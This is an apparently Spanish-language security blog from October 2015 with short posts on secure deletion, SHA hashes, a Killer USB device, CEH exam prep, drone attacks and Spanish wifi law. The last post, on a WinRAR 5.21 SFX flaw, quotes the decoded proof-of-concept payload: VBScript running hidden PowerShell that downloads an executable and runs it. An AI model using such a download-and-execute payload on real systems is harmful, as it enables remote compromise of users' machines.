Sed Buenos ;)

sábado, 17 de octubre de 2015

Borrar Archivos de Forma Segura Con shred

Ayer en el blog de Security Art Work hablaban del [borrado seguro] y como instituciones como la U.S Navy tenían ciertos patrones para realizarlo. La verdad es que viene de lujo tener esta información ya que siempre esta bien saber cuantas pasadas y de que manera las tendremos que pasar para considerar que la información esta bien borrada. 


Una de estas herramientas es shred que ya viene por defecto en sistemas como ubuntu (al menos en las versiones 14 si, como en mi caso) y la verdad es que es muy vesatil y fácil de utilizar.
  • shred [option]… file[…] 
Como veis solo seria ejecutar ese comando pasándole las opciones que prefiramos y el archivo a borrar. Eligiendo así el numero de pasadas y como queremos que haga estas pasadas. Si con unos, si con ceros o que sea totalmente aleatorio. 

Si queréis mas información acerca de lo que os puede ofrecer shred os dejo el siguiente enlace: 
Aunque si tenéis mas curiosidad sobre mas herramientas para diferentes plataformas os dejo el enlace a la entrada de Security Art Work:

viernes, 16 de octubre de 2015

¿Distribución Forense en Windows?

Hoy en el trabajo THE BOSS (ayer jugué un poco al MGS3 así que me lo tendréis que perdonar) ha pedido una distribución en la que fuera fácil hacer forenses de cualquier tipo. Supongo que si al pobre que le ha tocado ocuparse de la tarea hubiera decidido  buscar un poco en internet abría encontrado distribuciones como CAINE que ya esta preparadas para este uso. Pero no,al pobre se le ha ocurrido coger un Windows 7 y crear una imagen para botearla mas tarde desde un USB.


Bueno, después de enseñarle la "distro" a THE BOSS ha hecho hincapié en que habían aproximadamente unas 100 herramientas metidas allí. No se como las habrá ordenar pero si fuera yo construiría la distro/imagen siguiendo los siguientes pasos: 
  • En el blog de conexión inversa de Pedro Sanchez podemos encontrar una lista de 80 herramientas para Windows entre las que se encuentran también algunas para hacer forenses a diferentes dispositivos Android.  Ademas Pedro, muy sabiamente se ha encargado de ordenarlas según el RFC 3227 el cual indica el orden de extracción/recolección de evidencias y su almacenamiento. 
RFC son las siglas de Resquest For Coments y se trata de documentos que recogen propuestas de expertos sobre la materia con el fin de establecer una serie de pautas. 

Por cierto, el RFC 3227 lo podeis encontrar en las siguientes direcciones: 
Ok, con esto ya tendría las herramientas necesarias y podría crear directorios para ellas y para que nos sea mas fácil acceder a ellas.  Pero, eso seria demasiado fácil.
  • Si tuviera mas tiempo le haría un menú en Python que arranque los programas que THE BOSS necesite. 
Pero bueno, todo dependería del tiempo que tuviera yo. Si quereis la lista de herramientas os dejo el enlace al blog de ConexiónInversa aquí abajo: 
Esta sería mi manera de hacer una distro forense si tuviera que usar Windows y el tiempo justo. Aunque yo soy mas de la opinión de que cuanto mas pequeña sea la distro y menos machaque la RAM mejor. ¿Que opináis?

Sed Buenos ;)

jueves, 15 de octubre de 2015

JS, SHA-2 & SHA384

Hoy leyendo [la entrada de Hackplayers]donde hablaban de la incorporación de un hash en un script de javascript para evitar que estos sean modificados con fines malévolos. Una idea genial que ya se esta implementado en la Mozilla Developer Edition 43 pero, no hubiera puesto ese título si quisiera hablar de esto. 

En la entrada Vicente Motos ponía como ejemplo un script donde se invocaba/descargaba un archivo .js y que contenía el campo integrity donde estaba alojado el Hash en SHA384 para que, al ejecutar el script este compruebe la integridad del .js que se va a descargar.

Bueno, al no haber trabajado mucho con hashes esto de SHA384 me sonaba de la información que tendría que haber sabido para el CEH,(siento recordarlo pero aun me escama) así que, he cogido los apuntes y me he puesto a investigar un poco. 

SHA384 entra dentro de la familia de los Hashes SHA-2 en la que encontramos a SHA224, SHA256, SHA384, SHA512 que en lo único que se diferencian son en los bis del digets, vamos que se diferencia en "lo que caga" o dicho mas fino, en el tamaño del hash resultante. 

Como curiosidad diré que el NVD (National Vulnerabilities Database) del NIST usa SHA256 para comprobar la descarga de los Data Feeds de vulnerabilidades. 


Vale, es un hash de la familia SHA-2, por lo que no es vulnerable y ahora, ¿como puedo "jugar" con el?
Así que ya sabeis, no os fieis de los hashes MD5 y SHA-1 que no son de fiar.

Sed Buenos ;)

miércoles, 14 de octubre de 2015

Killer USB 2.0.- No Te Pinches Cualquier Cosa

No os hablé de la salida de la primera versión de este invento tan divertido ya que no entendía bien bien como explicarlo y eran necesario para poder hacer una entrada mas o menos digna. Así que hoy he empezado a ponerme las pilas y ha sido hora de "investigar" un poco su funcionamiento.

Killer USB es un lápiz USB (como se le llama por aquí) diseñado para prevenir ataques tan sonados como stuxnet o todos aquellos derivados de recoger y pinchar una memoria USB que te has encontrado por la calle.


La verdad es que el mensaje le quedará claro a la víctima ya que la primera versión de este  estaba destinado a "fundir" puertos USB de la máquina a la que fuese conectado con una tensión de -110V. Pero como no puede ser de otra manera la segunda versión llega a los -220V (casi la tensión que tenemos en nuestras casas) y es capaz de "fundir" la placa madre de un PC enterio. Ojo al vídeo. 


Podría dejar esta entrada ya aquí y encasquetaros la fuente, pero como he dicho que hay que investigarlo un poco y que me hacia gracia saber como este dispositivo es capaz de almacenar corriente y soltarla en el momento indicado para fundir lo que quiera.

La respuesta está en los condensadores, cuando los condensadores aumentan a -7V el transistor se cierra y el transformador de DC/DC (un transformador de corriente continua) se encarga de cargar los condensadores hasta que estén listos para descargar los -110V al puerto a fundir y repetir el proceso hasta que se haya roto todo. En caso de la versión 2 lo repetirá hasta que machaque todo el equipo.

Mas información:
Lo único que no me ha quedado del todo claro es el porqué  utiliza corrientes negativas. Así que si alguien tiene alguna idea, que me lo deje por los comentarios que no he podido encontrar nada al respecto.

Bueno ya sabéis, no recojais memorias USB del suelo o almonos no las proveis primero con vuestros equipos.

Sed Buenos ;)

martes, 13 de octubre de 2015

Tres... Dos... Uno... Choof

Como muchos ya sabréis hoy me he examinado del CEH (Si, de ese certificado que tanto os he spameado) y bueno... la verdad es que no se como empezar; podría ponerle todas las escusas que se me ocurrieran ahora pero si estoy publicando esto es para que veáis que todos lo que publicamos cosas en nuestros blogs no somos genios o lo queremos aparentar, o al menos para que yo sea una excepción a partir de hoy.


Si, hoy he suspendido el CEH (lo siento, pero se ha de escribir tanto de lo bueno como de lo malo y hoy me apetecía contarlo) y como aun tengo frescas las preguntas que debería haberme sabido os voy a recomendar como hacer frente a este examen tan tedioso o al menos recordarle al Albert del futuro lo que se tendrá que mirar.

Para empezar, si hubiera hecho caso a la entrada que hizo [@kinomakino] en su blog INSEGUROS sobre [Como conseguir el CEH v8 y no morir en el intento] y lo hubiera acompañado de la información del CEH que os dejé por [aquí], seguramente hubiera acertado todas las que no me sabia sobre leyes, por ejemplo. 

Por otra parte, si después me hubiera repasado las preguntas que venían en el "preparatorio", que os dejé [aquí], seguramente hubiera aprobado ya que habían preguntas exactamente iguales. 

No hay ninguna escusa que valga y soy consciente de ello así que como acción de mejora intentare explicar bien cada entrada del blog ya que por lo que podido ver dejo muchas cosas al aire. 

Sed Buenos ;)

SHA1 < SHA2 or SHA3

Bueno, esta es la entrada de ayer que no hice por estar preparando el CEH así que esta es la primera entrada de hoy.


Que, MD5 estaba totalmente roto y que SHA1 era teóricamente hackeable, no se le escapaba a nadie que estuviera metido en el mundillo ya que ha sido dicho por activa y por pasiva en bastantes ponencias. Pero desde hace unos días podemos decir que ambos algoritmos de hash están rotos y que seria necesario utilizar SHA2 o SHA3. 
"Los investigadores de la Informática Centrum Wiskunde y en los Países Bajos, INRIA en Francia y Universidad Tecnológica de Nanyang en Singapur [han demostrado que SHA-1 es vulnerable]a ataques de colisión que llamaron Freestart Collision."
Así que, si tenéis mas curiosidad sobre este tema o hacéis clic en el enlace de la cita o podéis encontrar mas información en la fuente de esta noticia:
 Sed Buenos y migrad a SHA2 o SHA3 xD

domingo, 11 de octubre de 2015

Pack.- CEHv8

Como ya os indiqué hace unos días, la [sección ###Aprende### de esta página] es un recopilatorio de todas esas entradas que yo creo que os pueden servir para aprender un poco.

Así que como hoy he estado estudiando para la certificación CEH, de la que tengo el examen este próximo martes,  creo que nos puede venir bien a todo tener las entradas que hice hace ya meses a mano y en la nueva sección. 

Pack.- CEHv8: 

######################################################
  1. Road To CEH.- ¿Qué hace un Hacker? 
  2. Road To CEH.- Ataque A Un Sistema
  3. Road To CEH.- Penetration Testing
  4. Road To CEH.- Reconocimiento y Footprinting
  5. Road To CEH.- Amenazas de un Footprinting 
  6. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 1)
  7. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 2)
  8. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 3)
  9. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 4)
  10. Road To CEH.- Fases de la Metodologia del Footprinting (Parte 5)
  11. Road To CEH.- Escaneo De Redes
  12. Road To CEH.- Scaneo De Redes (Parte 2)
  13. Road To CEH.- Scaneo De Redes (Parte 3)
  14. Road To CEH.- Scaneo De Redes (Parte 4) 
  15. Road To CEH.- Scaneo De Redes (Parte 5)
  16. Road To CEH.- Escaneo De Redes (Parte 6)
  17. Road To CEH.- Enumeración
  18. Road To CEH.- Enumeración (Parte 2)
  19. Road To CEH.- Enumeración (Parte 3)
  20. Road To CEH.- Malware (Parte 2)
  21. Road To CEH.- Malware (Parte 3)
  22. Road To CEH.- Malware (Parte 4)
  23. Road To CEH.- Malware (Parte 5)
  24. Road To CEH.- Malware (Parte 6)
  25. Road To CEH.- Malware (Parte 7)
  26. Road To CEH.- Malware (Parte 8)
  27. Road To CEH.- Ingeniería Social.
  28. Road To CEH.- Ingeniería Social. (Parte 2)
  29. Road To CEH.- Ingeniería Social. (Parte 3)
  30. Road To CEH.- Ingeniería Social. (Parte 4)
  31. Road To CEH.- Ingeniería Social. (Parte 5)
  32. Road To CEH.- Ingeniería Social. (Parte 6)
  33. Road To CEH.- Denegación de Servicio.
  34. Road To CEH.- Denegación de Servicio.(Parte 2)
  35. Road To CEH.- Denegación de Servicio (Parte 3)
  36. Road To CEH.- Denegación de Servicio (Parte 4)
  37. Road To CEH.- Denegación de Servicio (Parte 5)
  38. Road To CEH.- Hijacking De Sesión 
  39. Road To CEH.- Hijacking De Sesión (Parte 2)
  40. Road To CEH.- Hijacking De Sesión (Parte 3)
  41. Road To CEH.- Hijacking De Sesión (Parte 4) 
  42. Road To CEH.- Hijacking De Sesión (Parte 5)
######################################################

Sed Buenos y ahora me toca estudiar a mi xD

sábado, 10 de octubre de 2015

Como Acceder al Modo Dios De Windows 10

Primeramente esto del Modo Dios suena muy rimbombante y me gustaría explicar un poco mas en que consisten los modos dios de Windows.

"El “modo Dios” o God Mode es una característica que habilita la opción de ver toda la configuración posible del sistema en un único lugar y es algo más indicado para usuarios avanzados que para usuarios con pocos conocimientos de sistemas."
Al poder acceder al modo dios acedemos a todas las herramientas de configuración  para todo el sistema de Windows y la verdad es que es tan fácil como seguir las siguientes instrucciones, bueno encontrar la clave supongo que no ha sido fácil, pero ejecutarlo si lo es. 
  1. Crea una nueva carpeta en el Escritorio de Windows y darle el siguiente nombre: 
    • GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
  2. La carpeta de transformara en un icono parecido al del panel de control
  3. Hacemos doble clic en el y este nos mostrara un panel de configuración universal dando nos acceso a 260 funciones y herramientas.
Bueno, ahora ya sabéis como activarlo y poder curiosear y aprender un poco mas de del entrono Windows. También podéis acceder a este modo o panel de configuración utilizando a Cortana pero eso os dejo que lo leáis de las diferentes fuentes.

Fuentes: 

viernes, 9 de octubre de 2015

Aprende La Nueva Sección y Cambios.

Hace unos días os dije que tenia que hacer una página donde colocar todos los packs que he ido haciendo, Así que ahora podéis ver todos estos pack en la pagina ###Aprende ### que está debajo del titulo del blog. También y seguro que los mas allegados a este blog habréis visto, he borrado la lista de correo (ya que nadie la utiliza) y el rincón del maldito (que yo no actualizaba).





Pues esto han sido todos los cambios por hoy, si creeis que hay alguna entrada de als que he hecho que también deberia estar en la sección ### Aprende ### hacedmelo saber por los comentario o por cualquier lado por favor. 

Enlace a Aprende: 

 Sed Buenos ;) 

miércoles, 7 de octubre de 2015

Pack.- Hacking de Drones

Hasta la fecha os he hablado muchísimo del hackeo de drones, así que ya es hora de presentaros un pack con todas las entradas.  Si, es una entrada un poco sosa pero después me va muy bien a mi para localizar material el día que lo necesite. También podría hacer una página donde recopile todos los packs para que no caigan en el agujero negro del tiempo pero eso mejor otro día.


Hacking de Drones: 

    1. Hacking De Drones Militares A Traves De GPS Spoofing
    2. Drones, Giroscopios y Ruido (Interfiriendo en Drones)
    3. SensePost y El Arte De Interceptar Drones.

Sed Buenos con esto ;)

martes, 6 de octubre de 2015

La Privacidad y Transparencia De Las Grandes Empresas

Como ya os he hablado otras veces, una empresa que regala su servicio gratis, busca ser comprada, que pagues por microservicios o quiere vender tu información. Pero como podemos saber o que realmente hacen estas empresas con nuestra información.

Para aclarar esta duda el [Electronic Frontier Foundation (EFF)] una asociación sin animo de lucro que intenta defender la privacidad, la libre expresión y la innovación, ha presentado un informe donde se explica que hace cada una de estas empresas, ademas también incluye la siguiente tabla que nos va a ir perfecta.


La verdad es que ha sido una sorpresa ver que Whatsapp abogue tanto por la privacidad pero bueno, ahora la ha comprado Facebook y ya podéis ver en la tabla lo que hace este con nuestra información.

Si tenéis mas curiosidad os dejo el enlace al informe:

Fuente: 

lunes, 5 de octubre de 2015

SensePost y El Arte De Interceptar Drones.

Esta es [el ultimo vector de ataque] que nos faltaba por explorar en este blog. La interpretación de drones mediante el ataque Wireless Evil Twin. un ataque donde un Rogue AP (un punto de acceso Wifi falso) que intenta suplantar al legitimo para que el smartphone desde donde se controla al drone se conecte y podamos manipular esta información. 



 Para realizar este ataque [SensePost Information Security] ha programado una herramienta llamada Snoopy.

Snoopy es un sensor, recopilador de datos, interceptor, analizador, y una herramienta de visualización distribuida. Está escrito en formato modular, lo que permite la recogida de datos arbitrarios de diversas fuentes a través de plugins hechos en Python <3.

Enlace a la herramienta: 
Bueno con esto ya hacemos los 3 tipos de ataques para que los drones no nos toquen lo que no suena. 

Fuente: 
Sed Buenos con esto 0;) 

domingo, 4 de octubre de 2015

Toda La Documentación Para el CEHv8

Como ya sabéis algunos el día 13 de octubre tengo programado el examen del CEH, así que me he de poner las pilas y realizar test o leer contra mas información mejor. Desde aquí muchas gracias a [K2r4y] que ha compartido conmigo mucha información. Adames, para todos los que también estáis en este proceso, aquí tenéis toda la documentación de la versión 8 del CEh que el blog [Hackplayer] compartió hace unos días.


Temario:
Fuente:
Sed Buenos ;) 

sábado, 3 de octubre de 2015

Drones, Giroscopios y Ruido (Interfiriendo en Drones)

Hace unos días hablamos sobre los tres [tipos de hackeos a drones] y como es un tema que me pica mucho la curiosidad. Así que, como ya hablamos del [Spoofing de GPS para drones] hoy quiero compartir con vosotros un paper sobre como interferir en los giroscopios de un drone con el uso de ruido. 


Los drones están equipados con sistema [microelectromecánicos (Micro-Electro-Mechanical System MEMS)] en sus [giroscopios]. Así que, después de analizar la frecuencia de estos, descubrieron que lanzando ruido con una frecuencia resonante por debajo de 30Kh puede causar una desviación en dichos giroscopios y de esta manera desestabilizar un drone hasta el punto de hacerlo caer.


Así que, si queréis saber como realizar este ataque y sus contramedidas os recomiendo el paper. La verdad es que es curioso xD
Sed Buenos con esto 0;)

viernes, 2 de octubre de 2015

¿A que Nos Exponemos Cuando Hackeamos Una Wifis?

Muchas veces hemos hablado de Hacking de redes Wifis que si WEP, que si WPA2, etc pero nunca nos hemos parado a pensar de lo que puede pasar so nlo probamos este tipo de "experimentos" en un laboratorio. Así que ya es hora de que rebusquemos un poco en la ley a ver cuantos artículos incumplimos al vulnerar un punto de acceso wifi.  


Ya sabéis, esto son solo los punto que he podido encontrar yo si encontráis alguno mas podéis contactar por los comentarios o en la caja de sugerencias. 
Artículo 255 redactado por el número ciento treinta y dos del artículo único de la L.O. 1/2015, de 30 de marzo, por la que se modifica la L.O. 10/1995, de 23 de noviembre, del Código Penal («B.O.E.» 31 marzo).Vigencia: 1 julio 2015

1. Será castigado con la pena de multa de tres a doce meses el que cometiere defraudación utilizando energía eléctrica, gas, agua, telecomunicaciones u otro elemento, energía o fluido ajenos, por alguno de los medios siguientes:

  1. Valiéndose de mecanismos instalados para realizar la defraudación.
  2. Alterando maliciosamente las indicaciones o aparatos contadores.
  3. Empleando cualesquiera otros medios clandestinos.

2. Si la cuantía de lo defraudado no excediere de 400 euros, se impondrá una pena de multa de uno a tres meses.

Artículo 256 redactado por el número ciento treinta y tres del artículo único de la L.O. 1/2015, de 30 de marzo, por la que se modifica la L.O. 10/1995, de 23 de noviembre, del Código Penal («B.O.E.» 31 marzo).Vigencia: 1 julio 2015
1. El que hiciere uso de cualquier equipo terminal de telecomunicación, sin consentimiento de su titular, y causando a éste un perjuicio económico, será castigado con la pena de multa de tres a doce meses.

2. Si la cuantía del perjuicio causado no excediere de 400 euros, se impondrá una pena de multa de uno a tres meses.
Si habláramos del código penal que tenia vigencia en el 2007 tendríamos que mirar el 623 articulo 4. Pero bueno, creo que esto sería el peor problema que podría tener el atacante después de usar herramientas para tal fin.

Sed Buenos ;)

jueves, 1 de octubre de 2015

Como Explotar WinRAR 5.21 ¡Actualiza!

Ayer me llegó al correo una notificación de bugtraq donde la gente de RARLAB anunciaba que habían publicado una nueva vulnerabilidad en WinRAR. Si, la misma de la que os hablé en la entrada anterior. Bueno, la verdad es que me sorprendió ya que al ralo la vi publicada en [TheHackerNews] con el titulo de KILLER, empece a investigar un poco.
Ya hemos hablado un poco aquí [sobre Winrar y .zip] e incluso hemos explotado alguna vulnerabilidad en WinRAR 4.20 falsificando las extensiones.


Pero de la vulnerabilidad de la que os voy ha hablar hoy pasa mucho por un tema que me encanta que es el hecho de [bindear algo maligno para poder colarlo] en un auto-ejecutable SFX. 

Esta vulnerabilidad afecta a WinRAR 5.21 y permite la ejecución de código de forma remota a través de un HTML especialmente creado para tal fin y haciendo uso de la vulnerabilidad [CVE-2014-6332] / [MS15-064], la cual permite ejecución del código a través de Windows OLE. Mohammad Reza Espargham al encontrar la vulnerabilidad decidió gravarse el video y dejar una prueva de concepto (una PoC vamos) para todo aquel que quiera jugar un poco con la vulnerabilidad. 

Pero antes que dejaros el enlace a la PoC con las instrucciones para explotar la vulnerabilidad paso por paso. Os advierto que si descodificais el código ubicado en la variable my $poc= encontramos que automáticamente descarga un putty desde un servidor raro(no quiero ni saber si viene con bicho). 

Esto no es por que yo se muy listo sino por que en la PoC a bajo del todo lo pone:
  • $poc = decode_base64($poc);
Así que si lo "traducimos" encontramos lo siguiente: 
<SCRIPT LANGUAGE="VBScript">

function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe','load.exe');$(New-Object -com Shell.Application).ShellExecute('load.exe');"
shell.ShellExecute "powershell.exe", "-Command " & command, "", "runas", 0
end function 
</scrit>
Bueno, encontramos un html completo que se habria de modificar en caso de querer ejecutar otros tipos de funciones. Así que dicho esto,  os dejo el enlace y el vídeo para que podáis ver paso por paso como explotar esta vulnerabilidad. 

Enlace a la PoC :
Vídeo:


Quería haber grabado el vídeo yo igual que hice con el otro, pero me ha sido imposible.

Fuente:


Sed Buenos con esto 0;)